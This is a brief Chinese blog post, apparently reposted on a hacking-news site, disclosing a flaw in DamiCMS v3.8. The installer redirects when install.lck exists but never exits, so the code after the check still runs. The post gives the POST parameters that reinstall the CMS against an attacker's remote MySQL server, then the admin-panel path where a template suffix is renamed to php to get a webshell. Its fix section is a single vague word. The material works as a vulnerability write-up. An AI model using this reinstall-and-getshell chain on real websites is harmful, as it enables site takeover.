记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

大米cms暴力getshell

2014-12-12 21:15

 

看到

install\index.php



<?php
header("Content-type:text/html;charset=utf-8");
include_once('./function.php');
define('ROOT',dirname(dirname(__FILE__)));
$verMsg = 'v3.8';
$s_lang = 'utf-8';
$source_file = "./source/config.ini.php";//源配置文件
$target_file="../Public/Config/config.ini.php"; //目标配置文件。
$lock_file = '../install.lck';//锁定文件
if(file_exists($lock_file)){header('Location:../index.php');}



判断 install.lck是否存在。 然而只是做了 header, 并没有exit。 页面只是跳转了,但是后面的代码还是会继续执行的。

攻击者可以 在自己的服务器上开放mysql数据库外联。然后对这个页面post数据


step=4&dbhost=远程服务器ip&dbport=端口&dbuser=账户&dbpwd=密码&dbname=数据库名



就可以重装这个cms了。

然后使用默认密码进入后台,

/admin.php?s=/Tpl/Update

将模板后缀命名为 php 即可getshell。

 

 

 

修复方案:

过滤

 
知识来源: www.2cto.com/Article/201412/360410.html

阅读:59516 | 评论:0 | 标签:cms

想收藏或者和大家分享这篇好文章→复制链接地址

“大米cms暴力getshell”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云